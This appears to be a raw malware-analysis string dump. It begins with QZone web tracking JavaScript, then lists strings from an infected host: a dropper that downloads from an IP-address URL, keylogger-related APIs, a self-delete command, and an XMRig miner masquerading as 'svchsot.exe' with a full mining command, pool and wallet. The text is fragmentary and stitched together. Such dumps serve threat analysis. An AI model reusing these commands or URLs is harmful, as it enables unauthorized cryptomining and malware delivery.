url = [_s.config.webServerInterfaceURL,"?dm=",domain + ".hot","&url=",escape(url),"&tt=-","&hottag=",tag,"&hotx=",x,"&hoty=",y,"&rand=",Math.random()];
TCISD.hotClick._arrSend = function(arr,doc){
for(var i = 0,len = arr.length;i < len;i++){
TCISD.hotClick.send(arr[i].tag,arr[i].domain,arr[i].url,{doc:doc});
TCISD.hotClick.click = function(event,doc){
var _s = TCISD.hotClick,tags = _s.getTags(QZFL.event.getTarget(event),doc);
TCISD.hotClick.getTags = function(dom,doc){
var _s = TCISD.hotClick,tags = [],w = doc.parentWindow || doc.defaultView,rules = w._hotClick_params.rules,t;
for(var i = 0,len = rules.length;i < len;i++){
tags.push(t);
TCISD.hotClick.defaultRule = function(dom){
tag = dom.getAttribute("hottag");
if(tag && tag.indexOf("|") > -1){
t = tag.split("|");
TCISD.hotClick.config = TCISD.hotClick.config || {webServerInterfaceURL:"//pinghot.qq.com/pingd",reportRate:1,domain:null,url:null};
TCISD.hotClick._reportRate = typeof TCISD.hotClick._reportRate == 'undefined'?-1:TCISD.hotClick._reportRate;
TCISD.hotClick.isReport = function(){
var _s = TCISD.hotClick,rate;
if(_s._reportRate != -1){
return _s._reportRate;
rate = Math.round(_s.config.reportRate);
if(rate > 1 && (Math.random() * rate) > 1){
return(_s._reportRate = 0);
return(_s._reportRate = 1);
TCISD.hotClick.setConfig = function(opt){
var _sc = TCISD.hotClick.config,doc = opt.doc || document,w = doc.parentWindow || doc.defaultView;
if(opt.domain){
w._hotClick_params.domain = opt.domain;
if(opt.url){
w._hotClick_params.url = opt.url;
if(opt.reportRate){
w._hotClick_params.reportRate = opt.reportRate;
TCISD.hotAddRule = function(handler,opt){
var _s = TCISD.hotClick,doc = opt.doc || document,w = doc.parentWindow || doc.defaultView;
w._hotClick_params.rules.push(handler);
return w._hotClick_params.rules;
TCISD.hotClickWatch = function(opt){
var _s = TCISD.hotClick,w,l,doc;
doc = opt.doc = opt.doc || document;
w = doc.parentWindow || doc.defaultView;
w._hotClick_params.rules = [_s.defaultRule];
_s.setConfig(opt);
w.QZFL.event.addEvent(doc,"click",_s.click,[doc]);
if(typeof(window.TCISD) == 'undefined'){
TCISD.stringStat = function(dataId,hashValue,opts){
TCISD.stringStat.send(dataId,hashValue,opts);
TCISD.stringStat.send = function(dataId,hashValue,opts){
var _s = TCISD.stringStat,_c = _s.config,t = _c.defaultParams,url = [],isPost = false,htmlParam,sd;
dataId = dataId || t.dataId;
isPost = (opts.method && opts.method == 'post')?true:false;
if(hashValue[i].length && hashValue[i].length > 1024){
hashValue[i] = hashValue[i].substring(0,1024);
if(typeof(opts.reportRate) != 'number'){
if(opts.reportRate > 1 && (Math.random() * opts.reportRate) > 1){
if(isPost && QZFL.FormSender){
hashValue.dataId = dataId;
hashValue.sds = Math.random();
var sd = new QZFL.FormSender(_c.webServerInterfaceURL,'post',hashValue,'UTF-8');
sd.send();
htmlParam = TCISD.stringStat.genHttpParamString(hashValue);
url.push(_c.webServerInterfaceURL,'?');
url.push('dataId=',dataId);
url.push('&',htmlParam,'&');
url.push('ted=',Math.random());
QZFL.pingSender(url.join(''));
TCISD.stringStat.config = {webServerInterfaceURL:'//s.isdspeed.qq.com/cgi-bin/s.fcg',defaultParams:{dataId:1,reportRate:1,method:'get'}};
TCISD.stringStat.genHttpParamString = function(o){
res.push(k + '=' + window.encodeURIComponent(o[k]));
return res.join('&');
window.QZFL = window.QZONE = window.QZFL || window.QZONE || {};
QZFL.dom = {
return document.getElementById(id);
return _doc.compatMode == "CSS1Compat"?_doc.documentElement.clientHeight:_doc.body.clientHeight;
return _doc.compatMode == "CSS1Compat"?_doc.documentElement.clientWidth:_doc.body.clientWidth;
QZFL.css = {
var _s = QZFL.css;
return names && ((elem && elem.classList && !_s._reClassToken.test(names))?elem.classList.add(names):_s.updateClassName(elem,null,names));
return names && ((elem && elem.classList && !_s._reClassToken.test(names))?elem.classList.remove(names):_s.updateClassName(elem,names));
if(!elem || elem.nodeType != 1){
var oriName = elem.className,_s = QZFL.css,ar,b;
ar = oriName.split(_s._reClassToken);
var i = 0,l = ar.length,n;
ar = addNames.split(_s._reClassToken);
l = ar.length;
ar = removeNames.split(_s._reClassToken);
ar.length = 0;
ar.push(k);
oriName = ar.join(' ');
elem.className = oriName;
QZFL.event = {
if(!obj.eventsListUID){
obj.eventsListUID = "e" + (++QZFL.event._objSeqUID);
if(!(l = QZFL.event._eventListDictionary[obj.eventsListUID])){
l = QZFL.event._eventListDictionary[obj.eventsListUID] = {};
fn.__elUID = "e" + (++QZFL.event._fnSeqUID) + obj.eventsListUID;
if(!l[eventType].handlers){
l[eventType].handlers = {};
handlers = l[eventType].handlers;
return fn.apply(obj,!argArray?[QZFL.event.getEvent(evt)]:([QZFL.event.getEvent(evt)]).concat(argArray));
if(obj.addEventListener){
obj.addEventListener(eventType,cfn,false);
}else if(obj.attachEvent){
res = obj.attachEvent("on" + eventType,cfn);
var evt = window.event || evt || null,c,_s = QZFL.event.getEvent,ct = 0;
c = arguments.callee;
while(c && ct < _s.MAX_LEVEL){
if((evt = c.arguments[0]) && (typeof(evt.button) != "undefined" && typeof(evt.ctrlKey) != "undefined")){
c = c.caller;
var $ = QZFL.dom.getById;
QZONE.LoginPage = {
var lp = QZONE.LoginPage,sl_url = $('small_url');
bg_img.src = styleList[randomData].bg;
if(styleList[randomData].logoColor){
var logoColor = styleList[randomData].logoColor;
QZFL.css.addClassName(document.body, "mode_dark");
QZFL.css.addClassName(document.body,'mode_dark');
if(styleList[randomData].bottomColor){
var bottomColor = styleList[randomData].bottomColor;
QZFL.css.addClassName(document.body, "mode_dark_footer");
QZFL.css.addClassName(document.body,'mode_dark_footer');
if(styleList[randomData].authorSign){
if(!styleList[randomData].authorPrev){
styleList[randomData].authorPrev = "";
if(styleList[randomData].authorHref){
href = getUrl(styleList[randomData].authorHref);
document.getElementById("j-author-message").innerHTML = '<span class="author-title">' + styleList[randomData].authorPrev + '</span><a target="_blank" href="' + href + '" onclick="TCISD.pv(\'ihome.qzone.qq.com\',\'' + styleList[randomData].author_pv_key + '\');">' + styleList[randomData].authorSign + '</a>';
document.getElementById("j-author-message").innerHTML = "???";
function getUrl(url){
var http = "";
if(url){
if(url.toLowerCase().indexOf("hXXp://") == -1 && url.toLowerCase().indexOf("hXXps://") == -1){
http = window.location.protocol + "//";
return http + url;
TCISD.pv('ihome.qzone.qq.com',styleList[randomData].pv_key);
var sUrl = getParameter(location.href, 's_url');
sUrl = decodeURIComponent(sUrl).replace(/https?:\/\//g, '').replace(/\/\d+/g, '').replace(/[\?\#](.?)+|$/g, '');
TCISD.pv('user.qzone.qq.com', sUrl);
bg_img.onload = function(){
QZFL.css.addClassName(bg_img,'lay_background_img_fade_out');
lp.resizeBackground();
window.onload = function(){
lp.setLoginDivTop();
sl_url.href = p_smallUrl || '//i.qq.com/';
p_smallPic = '//qzs.qq.com/qzone/v6/v6_config/upload/' + p_smallPic;
if(window.ActiveXObject && (navigator.userAgent.indexOf('MSIE 6.0') > -1)){
document.execCommand('BackgroundImageCache',false,true);
sl_url.innerHTML = '<span class="img_wrap" style="background-image:url(\'' + p_smallPic + '\');_filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src=\'' + p_smallPic + '\');_background-image:none;">';
sl_url.innerHTML = '<img id="small_pic" src="' + p_smallPic + '" alt="" />';
sl_url.innerHTML = '<span class="img_slogan"></span>';
window.onresize = function(){
TCISD.pv('ihome.qzone.qq.com','login/i');
cw = QZFL.dom.getClientWidth(),
ch = QZFL.dom.getClientHeight(),
iw = bg_img.width,
ih = bg_img.height;
bg.style.width = cw + "px";
bg.style.height = ch + "px";
bg_img.style.width = cw + "px";
bg_img.style.height = new_h + "px";
bg_img.style.top = imgTop + "px";
bg_img.style.left = "";
bg_img.style.width = new_w + "px";
bg_img.style.height = ch + "px";
bg_img.style.left = imgLeft + "px";
bg_img.style.top = "";
setLoginDivTop:function(){
var dom_height = QZFL.dom.getClientHeight();
if(window.ActiveXObject && (navigator.userAgent.indexOf('MSIE 6.0') > -1) && dom_height < 600){
$('lay').style.height = '600px';
$('lay').style.height = '';
$('login_div').style.top = change_top + "px";
$('login_div').style.top = "100px";
QZONE.LoginPage.bootStrap();
var qq = getParameter(location.href, 'qzoneInIframe');
TCISD.stringStat(1000100, {
reportRate: 1
Iphgbnc.exe
hXXp://180.97.221.181:8980/x.exe
2017-07-31 19:24
C:\Windows\Iphgbnc.dat
PeekNamedPipe
DisconnectNamedPipe
CreatePipe
WinExec
GetProcessHeap
GetWindowsDirectoryA
RegCreateKeyA
RegQueryInfoKeyA
RegCreateKeyExA
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyA
RegOpenKeyExA
RegCloseKey
ShellExecuteA
MapVirtualKeyA
keybd_event
UnhookWindowsHookEx
SetWindowsHookExA
GetKeyState
ExitWindowsEx
EnumWindows
InternetOpenUrlA
.text
`.rodata
`.rotext
`.rdata
@.data
.rsrc
@.reloc
iphlpapi.dll
lIngress.exe
arpguard.exe
zrclient.exe
zrupdate.exe
zreboot.exe
This user account is used by the Visual Studio .NET Debugger
ntdll.dll
svchost.exe_2184:
.text
`.rdata
@.data
.rsrc
@.reloc
GetProcessWindowStation
operator
/c @ping -n 5 127.0.0.1&del
SvcCtrlFnct = x
-o stratum tcp://pool.minexmr.com:7777 -u 44s9vg9Ugds3Svix2vS7Vz6xAWr5MVYzjXh4C4MZNxviAPtuKhiJBWSFQxZMkrnJnQGx3yNvZGyUr9RRREmpEHSL6nMRH82 -p x -k
E:\Conding\xmrig\back\Miner_Loader\Release\Miner_Loader.pdb
WinExec
KERNEL32.dll
USER32.dll
RegOpenKeyW
RegCloseKey
RegOpenKeyExW
ADVAPI32.dll
SHELL32.dll
OLEAUT32.dll
GetCPInfo
InitOnceExecuteOnce
MaxPolicyElementKey
operator ""
operator co_await
not supported
operation in progress
operation not supported
operation would block
function not supported
inappropriate io control operation
"%s" hash self-test failed.
[%d-d-d d:d:d]%s %s%s
[%d-d-d d:d:d]
{"id":%llu,"jsonrpc":"2.0","method":"submit","params":{"id":"%s","job_id":"%s","nonce":"%s","result":"%s"}}
[%s:%u] getaddrinfo error: "%s"
{"id":%llu,"jsonrpc":"2.0","method":"login","params":{"login":"%s","pass":"%s","agent":"%s"}}
[%s:%u] JSON decode failed: "%s"
[%s:%u] error: "%s", code: %lld
[%s:%u] unsupported method: "%s"
[%s:%u] login error code: %d
{"id":%lld,"jsonrpc":"2.0","method":"keepalived","params":{"id":"%s"}}
[%s:%u] connect error: "%s"
[%s:%u] read error: "%s"
[%s:%u] DNS error: "%s"
[01;36m%s:%d
[01;30m%s
use pool %s:%d %s
[01;37m%u
[31m"%s"
accepted (%lld/%lld) diff %u "%s" (%llu ms)
[01;37m%s:%d
[01;37m%d
accepted (%lld/%lld) diff %u (%llu ms)
new job from %s:%d diff %d
.nicehash.com
stratum tcp://
userpass
%s: unsupported non-option argument '%s'
No pool URL supplied. Exiting.
XMRig 2.0.0
libuv/%s
libjansson/%s
unknown option -- %c
option requires an argument -- %s
option requires an argument -- %c
-o, --url=URL URL of mining server
-O, --userpass=U:P username:password pair for mining server
-p, --pass=PASSWORD password for mining server
-k, --keepalive send keepalived for prevent timeout (need pool support)
--nicehash enable nicehash support
--print-time=N print hashrate report every N seconds
unknown option -- %s
MSVC/%d
2.0.0
[01;36mXMRig/%s
[01;37m libuv/%s%s
* VERSIONS: XMRig/%s libuv/%s%s
[01;37mHUGE PAGES: %s, %s
* HUGE PAGES: %s, %s
[01;37mCPU: %s (%d) %sx64 %sAES-NI
* CPU: %s (%d) %sx64 %sAES-NI
* THREADS: %d, %s, av=%d, %sdonate=%d%%%s
[01;36m%d
[01;37m, %s, av=%d, %sdonate=%d%%%s
[01;37mPOOL #%d:
[01;36m%s:%d
* POOL #%d: %s:%d
speed 2.5s/60s/15m %s %s %s H/s max: %s H/s
[01;36m%s
[22;36m%s %s
[01;36m%s H/s
0123456789;
%s/%s (Windows NT %lu.%lu
) libuv/%s
msvc/%d
%u.%u.%u.%u
0123456789
Unknown system error %d
address family not supported
ai_family not supported
socket type not supported
operation canceled
illegal operation on a directory
socket operation on non-socket
operation not supported on socket
operation not permitted
broken pipe
protocol not supported
cannot send after transport endpoint shutdown
1.12.1-dev
%s: (%d) %s
(%d) %s
0.0.0.0
ntdll.dll
kernel32.dll
powrprof.dll
.text$di
.text$mn
.text$x
.text$yd
.idata$5
.CRT$XCA
.CRT$XCAA
.CRT$XCC
.CRT$XCU
.CRT$XCZ
.CRT$XIA
.CRT$XIAA
.CRT$XIAC
.CRT$XIC
.CRT$XIZ
.CRT$XPA
.CRT$XPB
.CRT$XPX
.CRT$XPXA
.CRT$XPZ
.CRT$XTA
.CRT$XTZ
.rdata
.rdata$r
.rdata$sxdata
.rdata$zzzdbg
.rtc$IAA
.rtc$IZZ
.rtc$TAA
.rtc$TZZ
.xdata$x
.idata$2
.idata$3
.idata$4
.idata$6
.data
.data$r
.rsrc$01
.rsrc$02
WS2_32.dll
CreateIoCompletionPort
SetNamedPipeHandleState
CreateNamedPipeW
PeekNamedPipe
GetNamedPipeHandleStateA
ConnectNamedPipe
MapVirtualKeyW
GetProcessHeap
%s near '%s'
%s near end of file
unable to decode byte 0x%x
control character 0x%x
invalid Unicode '\uX\uX'
invalid Unicode '\uX'
NUL byte in object key not supported
duplicate object key
unable to open %s: %s
\\?\pipe
0.4.0
<requestedExecutionLevel level='asInvoker' uiAccess='false' />
; Win64; x64) libuv/%s
.text$mn$00
.xdata
.pdata
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
mscoree.dll
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
KERNEL32.DLL
WUSER32.DLL
oKernel32.dll
%s\%s
%s %s
\svchost.exe
Akernel32.dll
minkernel\crts\ucrt\inc\corecrt_internal_strtox.h
__crt_strtox::floating_point_value::as_double
__crt_strtox::floating_point_value::as_float
ext-ms-win-ntuser-windowstation-l1-1-0
\\?\UNC\
%s\%.*s
sadvapi32.dll
VVV.xmrig.com
Copyright (C) 2016-2017 xmrig.com
xmrig.exe
E\\?\
Windows Help log
Windows Help logs.
svchsot.exe
C:\Users\"%CurrentUserName%"\AppData\Roaming\xmrig\svchost.exe
C:\Windows\TEMP\\svchsot.exe -o stratum tcp://pool.minexmr.com:7777 -u 44s9vg9Ugds3Svix2vS7Vz6xAWr5MVYzjXh4C4MZNxviAPtuKhiJBWSFQxZMkrnJnQGx3yNvZGyUr9RRREmpEHSL6nMRH82 -p x -k
C:\Windows\TEMP\\svchsot.exe
svchost.exe_3748:
.text
`.data
.rsrc
@.reloc
msvcrt.dll
API-MS-Win-Core-ProcessThreads-L1-1-0.dll
KERNEL32.dll
NTDLL.DLL
API-MS-Win-Security-Base-L1-1-0.dll
API-MS-WIN-Service-Core-L1-1-0.dll
API-MS-WIN-Service-winsvc-L1-1-0.dll
RPCRT4.dll
ole32.dll
ntdll.dll
_amsg_exit
RegCloseKey
RegOpenKeyExW
GetProcessHeap
svchost.pdb
version="5.1.0.0"
name="Microsoft.Windows.Services.SvcHost"
<description>Host Process for Windows Services</description>
<requestedExecutionLevel
Software\Microsoft\Windows NT\CurrentVersion\Svchost
Software\Microsoft\Windows NT\CurrentVersion\MgdSvchost
\PIPE\
Host Process for Windows Services
6.1.7600.16385 (win7_rtm.090713-1255)
svchost.exe
Windows
Operating System
6.1.7600.16385
svchsot.exe_2276:
.text
`.rdata
@.data
.rsrc
@.reloc
InitOnceExecuteOnce
MaxPolicyElementKey
operator
operator ""
operator co_await
%S#[k
not supported
operation in progress
operation not supported
operation would block
function not supported
inappropriate io control operation
"%s" hash self-test failed.
[%d-d-d d:d:d]%s %s%s
[%d-d-d d:d:d]
{"id":%llu,"jsonrpc":"2.0","method":"submit","params":{"id":"%s","job_id":"%s","nonce":"%s","result":"%s"}}
[%s:%u] getaddrinfo error: "%s"
{"id":%llu,"jsonrpc":"2.0","method":"login","params":{"login":"%s","pass":"%s","agent":"%s"}}
[%s:%u] JSON decode failed: "%s"
[%s:%u] error: "%s", code: %lld
[%s:%u] unsupported method: "%s"
[%s:%u] login error code: %d
{"id":%lld,"jsonrpc":"2.0","method":"keepalived","params":{"id":"%s"}}
[%s:%u] connect error: "%s"
[%s:%u] read error: "%s"
[%s:%u] DNS error: "%s"
[01;36m%s:%d
[01;30m%s
use pool %s:%d %s
[01;37m%u
[31m"%s"
accepted (%lld/%lld) diff %u "%s" (%llu ms)
[01;37m%s:%d
[01;37m%d
accepted (%lld/%lld) diff %u (%llu ms)
new job from %s:%d diff %d
.nicehash.com
stratum tcp://
userpass
%s: unsupported non-option argument '%s'
No pool URL supplied. Exiting.
XMRig 2.0.0
libuv/%s
libjansson/%s
unknown option -- %c
option requires an argument -- %s
option requires an argument -- %c
-o, --url=URL URL of mining server
-O, --userpass=U:P username:password pair for mining server
-p, --pass=PASSWORD password for mining server
-k, --keepalive send keepalived for prevent timeout (need pool support)
--nicehash enable nicehash support
--print-time=N print hashrate report every N seconds
unknown option -- %s
MSVC/%d
2.0.0
[01;36mXMRig/%s
[01;37m libuv/%s%s
* VERSIONS: XMRig/%s libuv/%s%s
[01;37mHUGE PAGES: %s, %s
* HUGE PAGES: %s, %s
[01;37mCPU: %s (%d) %sx64 %sAES-NI
* CPU: %s (%d) %sx64 %sAES-NI
* THREADS: %d, %s, av=%d, %sdonate=%d%%%s
[01;36m%d
[01;37m, %s, av=%d, %sdonate=%d%%%s
[01;37mPOOL #%d:
[01;36m%s:%d
* POOL #%d: %s:%d
speed 2.5s/60s/15m %s %s %s H/s max: %s H/s
[01;36m%s
[22;36m%s %s
[01;36m%s H/s
0123456789;
%s/%s (Windows NT %lu.%lu
) libuv/%s
msvc/%d
tX4Fr.rh.46Aw-wl-6
.eK9K\9.
%u.%u.%u.%u
0123456789
Unknown system error %d
address family not supported
ai_family not supported
socket type not supported
operation canceled
illegal operation on a directory
socket operation on non-socket
operation not supported on socket
operation not permitted
broken pipe
protocol not supported
cannot send after transport endpoint shutdown
1.12.1-dev
%s: (%d) %s
(%d) %s
0.0.0.0
ntdll.dll
kernel32.dll
powrprof.dll
.text$di
.text$mn
.text$x
.text$yd
.idata$5
.CRT$XCA
.CRT$XCAA
.CRT$XCC
.CRT$XCU
.CRT$XCZ
.CRT$XIA
.CRT$XIAA
.CRT$XIAC
.CRT$XIC
.CRT$XIZ
.CRT$XPA
.CRT$XPB
.CRT$XPX
.CRT$XPXA
.CRT$XPZ
.CRT$XTA
.CRT$XTZ
.rdata
.rdata$r
.rdata$sxdata
.rdata$zzzdbg
.rtc$IAA
.rtc$IZZ
.rtc$TAA
.rtc$TZZ
.xdata$x
.idata$2
.idata$3
.idata$4
.idata$6
.data
.data$r
.rsrc$01
.rsrc$02
WS2_32.dll
CreateIoCompletionPort
SetNamedPipeHandleState
CreateNamedPipeW
PeekNamedPipe
GetNamedPipeHandleStateA
ConnectNamedPipe
KERNEL32.dll
MapVirtualKeyW
USER32.dll
ADVAPI32.dll
GetProcessHeap
GetCPInfo
%s near '%s'
%s near end of file
unable to decode byte 0x%x
control character 0x%x
invalid Unicode '\uX\uX'
invalid Unicode '\uX'
NUL byte in object key not supported
duplicate object key
unable to open %s: %s
\\?\pipe
0.4.0
719437097711488
C:\Windows\TEMP\svchsot.exe
pool.minexmr.com
<requestedExecutionLevel level='asInvoker' uiAccess='false' />
1,2m2
?"?(?`?~?
7#7'7 7/737
7&8.868>8~8
00C0`0n0
5*51585|6
5(575\5~5
0 0$0(0,0
minkernel\crts\ucrt\inc\corecrt_internal_strtox.h
__crt_strtox::floating_point_value::as_double
__crt_strtox::floating_point_value::as_float
mscoree.dll
ext-ms-win-ntuser-windowstation-l1-1-0
\\?\UNC\
%s\%.*s
sadvapi32.dll
VVV.xmrig.com
Copyright (C) 2016-2017 xmrig.com
xmrig.exe
conhost.exe_2264:
.text
`.data
.rsrc
@.reloc
GDI32.dll
USER32.dll
msvcrt.dll
ntdll.dll
API-MS-Win-Core-LocalRegistry-L1-1-0.dll
KERNEL32.dll
IMM32.dll
ole32.dll
OLEAUT32.dll
PutInputInBuffer: EventsWritten != 1 (0x%x), 1 expected
Invalid message 0x%x
InitExtendedEditKeys: Unsupported version number(%d)
Console init failed with status 0x%x
CreateWindowsWindow failed with status 0x%x, gle = 0x%x
InitWindowsStuff failed with status 0x%x (gle = 0x%x)
InitSideBySide failed create an activation context. Error: %d
GetModuleFileNameW requires more than ScratchBufferSize(%d) - 1.
GetModuleFileNameW failed %d.
Invalid EventType: 0x%x
Dup handle failed for %d of %d (Status = 0x%x)
Couldn't grow input buffer, Status == 0x%x
InitializeScrollBuffer failed, Status = 0x%x
CreateWindow failed with gle = 0x%x
Opening Font file failed with error 0x%x
\ega.cpi
NtReplyWaitReceivePort failed with Status 0x%x
ConsoleOpenWaitEvent failed with Status 0x%x
NtCreatePort failed with Status 0x%x
GetCharWidth32 failed with error 0x%x
GetTextMetricsW failed with error 0x%x
GetSystemEUDCRangeW: RegOpenKeyExW(%ws) failed, error = 0x%x
RtlStringCchCopy failed with Status 0x%x
Cannot allocate 0n%d bytes
|%SWj
O.fBf;
ReCreateDbcsScreenBuffer failed. Restoring to CP=%d
Invalid Parameter: 0x%x, 0x%x, 0x%x
ConsoleKeyInfo buffer is full
Invalid screen buffer size (0x%x, 0x%x)
SetROMFontCodePage: failed to memory allocation %d bytes
FONT.NT
Failed to set font image. wc=x, sz=(%x,%x)
Failed to set font image. wc=x sz=(%x, %x).
Failed to set font image. wc=x sz=(%x,%x)
FullscreenControlSetColors failed - Status = 0x%x
FullscreenControlSetPalette failed - Status = 0x%x
WriteCharsFromInput failed 0x%x
WriteCharsFromInput failed %x
RtlStringCchCopyW failed with Status 0x%x
CreateFontCache failed with Status 0x%x
FTPh
\>.Sj
GetKeyboardLayout
MapVirtualKeyW
VkKeyScanW
GetKeyboardState
UnhookWindowsHookEx
SetWindowsHookExW
GetKeyState
ActivateKeyboardLayout
GetKeyboardLayoutNameA
GetKeyboardLayoutNameW
_amsg_exit
_acmdln
ShipAssert
NtReplyWaitReceivePort
NtCreatePort
NtEnumerateValueKey
NtQueryValueKey
NtOpenKey
NtAcceptConnectPort
NtReplyPort
SetProcessShutdownParameters
GetCPInfo
conhost.pdb
%$%a%b%V%U%c%Q%W%]%\%[%
%<%^%_%Z%T%i%f%`%P%l%g%h%d%e%Y%X%R%S%k%j%
version="5.1.0.0"
name="Microsoft.Windows.ConsoleHost"
<requestedExecutionLevel
name="Microsoft.Windows.ConsoleHost.SystemDefault"
publicKeyToken="6595b64144ccf1df"
name="Microsoft.Windows.SystemCompatible"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
< =$>:>@>
2%2X2
%SystemRoot%
\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Console\TrueTypeFont
\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Console\FullScreen
WindowSize
ColorTableu
ExtendedEditkeyCustom
ExtendedEditKey
Software\Microsoft\Windows\CurrentVersion
\ !:=/.<>;|&
%d/%d
cmd.exe
desktop.ini
\console.dll
%d/%d
6.1.7601.17641 (win7sp1_gdr.110623-1503)
CONHOST.EXE
Windows
Operating System
6.1.7601.17641
WerFault.exe_556:
.text
`.data
.rsrc
@.reloc
ADVAPI32.dll
ntdll.DLL
KERNEL32.dll
USER32.dll
msvcrt.dll
ole32.dll
OLEAUT32.dll
SHLWAPI.dll
IMM32.dll
wer.dll
COMCTL32.dll
faultrep.dll
Starting kernel vertical - %S
rundll32.exe
NtQueryInformationProcess failed with status: 0x%x
Reporting never started for process id %u
StringCchPrintf failed with 0x%x
NtWow64QueryInformationProcess64 failed with 0x%x
NtWow64ReadVirtualMemory64 failed with 0x%x
NtQueryInformationProcess failed with status 0x%x
WerpNtWow64QueryInformationProcess64 failed with status 0x%x
StringCchCopy failed with 0x%x
Invalid arg in %s
wdi.dll
dbgeng.dll
dbghelp.dll
SETUPAPI.dll
SHELL32.dll
VERSION.dll
WTSAPI32.dll
WerFault.pdb
PSShD
tSSh,<
t.PSj6
t5SSh
SShx`
tsShxc
t.Ph0j
_amsg_exit
RegCloseKey
RegCreateKeyExW
RegOpenKeyExW
RegEnumKeyExW
RegQueryInfoKeyW
GetProcessHeap
GetWindowsDirectoryW
RegDeleteKeyW
ReportEventW
RegOpenKeyW
RegSetKeyValueW
GetProcessWindowStation
EnumWindows
NtAlpcSendWaitReceivePort
NtAlpcConnectPort
ShipAssert
ntdll.dll
RegisterErrorReportingDialog
WerReportSubmit
WerReportAddFile
WerReportCreate
WerReportCloseHandle
WerReportSetUIOption
WerpGetReportConsent
WerpSetIntegratorReportId
WerpReportCancel
WerpAddRegisteredDataToReport
WerReportAddDump
WerpCreateIntegratorReportId
WerpSetReportFlags
WerpGetReportFlags
WerpIsTransportAvailable
WerReportSetParameter
WerpInitiateCrashReporting
version="1.0.0.0"
name="Microsoft.Windows.Feedback.Watson"
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
<asmv3:windowsSettings xmlns="hXXp://schemas.microsoft.com/SMI/2005/WindowsSettings">
</asmv3:windowsSettings>
<requestedExecutionLevel
ÝCD0
#$$$3355<
##$$$335566
% "#$$$3355666=
"#$$33555666
!.DQ$
.Py>o
Kÿg
.ib:?
T3%X_
a,M.cbd
KEYW8
KEYWH
? ?$?(?,?0?4?8?
1 2$2(2,20242
>,?0?4?8?<?@?
?%?5?:?|?
5'565^5{5
3#3(353_3
=#='= =/=3=7=;=?=
=#=(=>=]=
>!>&>3>}>
1!1&131[1
Microsoft\Windows\WindowsErrorReporting\WerFault
%s %s
Global\WerKernelVerticalReporting
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\CrashControl
CrashDumpEnabled.Old
CrashDumpEnabled.New
%SystemRoot%\MEMORY.DMP
LiveKernelReports
Software\Microsoft\Windows\Windows Error Reporting\LiveKernelReports
LiveKernelReportsPath
BCCode=%x&BCP1=%p&BCP2=%p&BCP3=%p&BCP4=%p&OS Version=%u_%u_%u&Service Pack=%u_%u&Product=%u_%u
*WerKernelReporting
%SYSTEMROOT%\SYSTEM32\WerFault.exe -k -rq
SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
SOFTWARE\Microsoft\Windows\Windows Error Reporting\KernelFaults\Queue
sysdata.xml
%s -k -q
SOFTWARE\Microsoft\Windows NT\CurrentVersion
<OSVER>%u.%u.%u %u.%u</OSVER>
<OSLANGUAGE>%u</OSLANGUAGE>
<ARCHITECTURE>%u</ARCHITECTURE>
<PRODUCTTYPE>%u</PRODUCTTYPE>
<FILESIZE>%u</FILESIZE>
<CREATIONDATE>d-d-d d:d:d</CREATIONDATE>
<NAME>%s</NAME>
<DATA>%s</DATA>
<ERROR>Failed at Step: %s with error 0x%x</ERROR>
%sDrivers\%s.sys
</%s>
<%s>%s</%s>
%u.%u.%u.%u
*.mrk
WER-%u-%u.sysdata.xml
Software\Microsoft\Windows\CurrentVersion\CEIPRole\RolesInWER
SOFTWARE\Microsoft\Windows\CurrentVersion\Reliability\MemoryDiagnostic
Web Server
Software\Microsoft\Windows\Windows Error Reporting\Debug
%SystemRoot%\Minidump
0xx (0xx, 0xx, 0xx, 0xx)
%s\%2.2d%2.2d%2.2d-%u-%2.2d.dmp
*.dmp
Software\Microsoft\Windows\Windows Error Reporting
Software\Policies\Microsoft\Windows\Windows Error Reporting
\KernelObjects\SystemErrorPortReady
%s\%s
Microsoft.Windows.Setup
\WindowsErrorReportingServicePort
(0x%x): %s
%u %s
WindowsNTVersion
%u.%u
ErrorPort
\StringFileInfo\xx\%s
HKEY_USERS\
HKEY_CURRENT_CONFIG\
HKEY_CLASSES_ROOT\
HKEY_LOCAL_MACHINE\
HKEY_CURRENT_USER\
%s="%s"
%s.%s
%s %d
Software\Microsoft\Windows\Windows Error Reporting\Hangs
_NT_EXECUTABLE_IMAGE_PATH
wxmu.dmp
wxhu.dmp
axmu.dmp
axhu.dmp
hu.kdmp
mu.kdmp
hu.dmp
mu.dmp
Software\Microsoft\.NETFramework
NOT_TCPIP
sos.dll
version.xml
.version.xml
%s.xml
memory.hdmp
minidump.mdmp
Local\WERReportingForProcess%d
atk.kdmp
Software\Microsoft\Windows\Windows Error Reporting\Hangs\NHRTimes
%i|%d|%d
xxxxxxxxxxxxxxxx
xx
%d.%d.%d.%d
D:P(A;;GA;;;BA)(A;;GA;;;SY)(A;;GA;;;%s)
D:P(A;;GA;;;BA)(A;;GA;;;SY)(A;;GA;;;%s)S:(ML;;NR;;;HI)
dc.noreflect
dc.xpmemdump
dc.xpdata
dc.CustomDump
dc.expmodmem
dc.expmoddata
dc.OnDemandKdmp
dc.xpmodmem
dc.xpmoddata
default=%s
memory=%s
module=%s
.dbgcfg.ini
ElevatedDataCollectionStatus.txt
Open process failed unexpectedly: 0X%X
Attempting to cross-proc reporting process!
Elevation:Administrator!new:%s
Reflection attempt failed: 0X%X
Attempting to reflect reporting process!
Could not collect dump for reflection cross process: 0x%x
Could not collect xproc for reflection: 0x%x
CollectFile for reflection failed: 0x%x
Could not collect dump for cross process: 0x%x
CollectReflectionDump failed with: 0x%x
0 processes found for xproc module: %s
Could not collect cross dump from module: 0x%x
CollectCrossProcessModuleDumps failed: 0x%x
CollectCrossProcessDumps failed: 0x%x
KernelDump failed: 0x%x
ProcessHandle
%s|%s
rpcrt4
\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\AeDebugProtected\AutoExclusionList
\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\AeDebug\AutoExclusionList
